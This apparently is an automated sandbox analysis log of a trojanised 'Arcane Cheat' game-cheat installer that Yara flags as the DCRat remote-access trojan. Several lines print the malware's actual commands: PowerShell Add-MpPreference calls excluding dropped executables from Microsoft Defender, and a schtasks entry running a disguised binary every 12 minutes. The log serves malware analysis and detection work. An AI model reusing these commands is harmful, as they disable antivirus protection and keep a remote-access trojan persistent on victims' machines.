            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'Jump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" Jump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /fJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083ED5B cpuid 3_2_0083ED5B
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_0083A63C
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeQueries volume information: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe VolumeInformationJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\addins\audiodg.exeQueries volume information: C:\Windows\addins\audiodg.exe VolumeInformation
            Source: C:\Windows\addins\audiodg.exeQueries volume information: C:\Windows\addins\audiodg.exe VolumeInformation
            Source: C:\Recovery\explorer.exeQueries volume information: C:\Recovery\explorer.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Recovery\explorer.exeQueries volume information: C:\Recovery\explorer.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082ACF5 GetVersionExW,3_2_0082ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
